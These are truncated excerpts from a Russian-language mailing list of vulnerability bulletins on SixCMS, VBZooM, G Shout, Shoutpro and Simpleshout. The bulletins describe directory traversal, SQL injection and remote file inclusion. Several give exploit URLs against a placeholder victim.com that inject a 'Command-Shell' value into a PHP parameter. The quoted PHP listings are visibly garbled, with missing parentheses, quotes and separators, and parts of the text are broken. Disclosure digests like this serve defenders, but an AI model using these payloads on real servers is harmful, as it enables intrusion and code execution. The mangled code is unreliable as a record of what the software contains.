Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в SixCMS.
Компьютер для продвинутых пользователей В этом выпуске: SixCMS ПО: SixCMS Версия: 6 Сайт: http://www.sixcms.de О SixCMS: SixCMS это хорошо известный коммерческий менеджер управления сайтом. Уязвимость: Ввод параметра "template" в 'detail.php' не проверяется до использования. Доступ к известному файлу вывода через веб-доступ и текущую директорию возможен через технику перемещения директорий. Это возможно через использование ././" в HTTP запросе. Параметр "page" не проверяется до выполнения в файле 'list.php...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в VBZooM.
Компьютер для продвинутых пользователей В этом выпуске: VBZooM ПО: VBZooM Версия: 1.11 Уязвимость: Возможность SQL-запроса не сервере. Использование : http://www.victim.com//show.php?UserID$UserID...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в G Shout.
Компьютер для продвинутых пользователей В этом выпуске: G Shout ПО: G Shout Версия: 1.3.1 Уязвимость: Возможность выполнения кода на сервере. Листинг: include"config.php); include./includes/functions.inc.php); include ./languages/lang$language.php); Использование: http://www.victim.com/G Shout/shoutbox.php?language=Command-Shell Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Shoutpro.
Компьютер для продвинутых пользователей В этом выпуске: Shoutpro ПО: Shoutpro Версия: 1.0 Уязвимость: Возможность выполнения кода на сервере. Листинг: include"config.php); include"functions.php); if $path{ $ips = file$path/lists/bannedips.php); } else { $ips = file"lists/bannedips.php); } if (in_array$REMOTE_ADDR$ips) { echo$bannedmessage); die; } Использование: http://www.victim.com/Shoutpro/include.php?path=Command-Shell Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информ...
Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Simpleshout.
Компьютер для продвинутых пользователей В этом выпуске: Simpleshout ПО: Simpleshout Версия: 1.6.0 Уязвимость: Возможность выполнения кода на сервере. Использование: http://www.victim.com/Simpleshout/sboard.php?config=Command-Shell Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...